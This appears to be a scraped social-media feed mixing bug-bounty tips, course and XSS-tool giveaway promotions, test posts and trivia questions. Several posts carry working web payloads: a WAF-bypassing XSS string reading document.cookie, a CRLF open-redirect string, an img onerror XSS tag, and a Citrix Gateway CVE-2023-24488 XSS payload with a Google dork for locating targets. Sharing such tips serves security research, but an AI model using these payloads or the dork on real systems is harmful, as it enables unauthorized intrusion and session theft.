Rakib Khan

test.ok?p=test<S>s -> test&lt;s&gt;s test.ok?p[%3C%svg%20%onload%3dalert(document.cookie)%3E]=test -> {"<svg onload=alert(document.cookie)>":"test"} % in front of svg and onload ->used to bypass the WAF %3d -> = URL-encoded to bypass the filter it's worth trying this old trick

fakewebsite.tw%0d%https://t.co/2ekExV77qF fakewebsite.tw%https://t.co/HcC7HEtnbq

@NahamSec RCE

I have pushed 3 massive updates to my course since July to include more labs/videos on SSRF, RCE, ATO, 403/401 Bypasses, and more! 🧑🏽‍💻 👀 I'll give away two free vouchers to two people who retweet and reply with 'RCE' under this post! ℹ️ More info 👉🏼 bugbounty.nahamsec.training

🚨 KNOXSS GIVEAWAY! 🚨 LIKE ♥️ and SHARE 📤 this to have a chance to win one of the following 🥇 1 Pro Sub 1-year 🥈 1 Pro Sub 6-months 🥉 1 Pro Sub 3-months Winners of this draw will be announced on October 7th 2024, good luck! 😀🤞 #KNOXSS - The magic ✨ #XSS tool.

🥰Thank you to the researchers and users for your contributions and support. Let's celebrate our 3rd anniversary together! 💡Activity: Share this post(3rd-of-tecnosrc-0922.mystrikingly.com) to win 50 credits. ➡️Time: 9.22-9.30 (UTC+8) #hack #infosec #bugbounty #AppSec #cybersecurity

This is a test post

This is a schedule post 3.5rd time"><img src=1 onerror=alert(1)>;

How to find Citrix Gateway Open Redirect and XSS (CVE-2023-24488) - using Google Dorking Dork: "inurl:/vpn/logout.html" Payload: /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script> Be ready for duplicates :) #bugbountytips #bugbounty

Where are you from?

What is the name of the Capital of Bangladesh?

Hello World!!!